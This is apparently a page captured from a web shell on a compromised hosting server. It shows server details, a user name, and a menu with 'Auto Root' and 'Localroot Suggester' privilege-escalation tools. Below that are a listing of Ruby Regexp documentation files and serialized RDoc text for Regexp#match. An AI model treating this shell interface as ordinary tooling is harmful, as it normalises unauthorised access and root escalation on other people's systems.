Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.217.130
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby20 /
share /
ri /
2.0.0 /
system /
Regexp /
Delete
Unzip
Name
Size
Permission
Date
Action
%3d%3d%3d-i.ri
811
B
-rw-r--r--
2023-07-26 17:38
%3d%3d-i.ri
714
B
-rw-r--r--
2023-07-26 17:38
%3d%7e-i.ri
1.82
KB
-rw-r--r--
2023-07-26 17:38
%7e-i.ri
508
B
-rw-r--r--
2023-07-26 17:38
as_json-i.ri
372
B
-rw-r--r--
2023-07-26 17:38
casefold%3f-i.ri
534
B
-rw-r--r--
2023-07-26 17:38
cdesc-Regexp.ri
35.11
KB
-rw-r--r--
2023-07-26 17:38
compile-c.ri
297
B
-rw-r--r--
2023-07-26 17:38
encoding-i.ri
355
B
-rw-r--r--
2023-07-26 17:38
eql%3f-i.ri
718
B
-rw-r--r--
2023-07-26 17:38
escape-c.ri
703
B
-rw-r--r--
2023-07-26 17:38
fixed_encoding%3f-i.ri
1.46
KB
-rw-r--r--
2023-07-26 17:38
hash-i.ri
349
B
-rw-r--r--
2023-07-26 17:38
inspect-i.ri
589
B
-rw-r--r--
2023-07-26 17:38
json_create-c.ri
466
B
-rw-r--r--
2023-07-26 17:38
last_match-c.ri
1.34
KB
-rw-r--r--
2023-07-26 17:38
match-i.ri
1.15
KB
-rw-r--r--
2023-07-26 17:38
named_captures-i.ri
904
B
-rw-r--r--
2023-07-26 17:38
names-i.ri
599
B
-rw-r--r--
2023-07-26 17:38
new-c.ri
1.4
KB
-rw-r--r--
2023-07-26 17:38
options-i.ri
1.12
KB
-rw-r--r--
2023-07-26 17:38
quote-c.ri
701
B
-rw-r--r--
2023-07-26 17:38
source-i.ri
536
B
-rw-r--r--
2023-07-26 17:38
to_json-i.ri
397
B
-rw-r--r--
2023-07-26 17:38
to_s-i.ri
1.12
KB
-rw-r--r--
2023-07-26 17:38
try_convert-c.ri
796
B
-rw-r--r--
2023-07-26 17:38
union-c.ri
1.17
KB
-rw-r--r--
2023-07-26 17:38
Save
Rename
U:RDoc::AnyMethod[iI" match:ETI"Regexp#match;TF:publico:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [ I"FReturns a <code>MatchData</code> object describing the match, or ;TI"R<code>nil</code> if there was no match. This is equivalent to retrieving the ;TI"Mvalue of the special variable <code>$~</code> following a normal match. ;TI"QIf the second parameter is present, it specifies the position in the string ;TI"to begin the search.;To:RDoc::Markup::BlankLine o:RDoc::Markup::Verbatim; [I"+/(.)(.)(.)/.match("abc")[2] #=> "b" ;TI"+/(.)(.)/.match("abc", 1)[2] #=> "c" ;T:@format0o; ; [I"OIf a block is given, invoke the block with MatchData if match succeed, so ;TI"that you can write;T@o;; [I"pat.match(str) {|m| ...} ;T; 0o; ; [I"instead of;T@o;; [I"if m = pat.match(str) ;TI" ... ;TI" end ;T; 0o; ; [I"CThe return value is a value from block execution in this case.;T: @fileI" re.c;T:0@omit_headings_from_table_of_contents_below0I"Wrxp.match(str) -> matchdata or nil rxp.match(str,pos) -> matchdata or nil ;T0[ I"(p1, p2 = v2);T@)FI"Regexp;TcRDoc::NormalClass0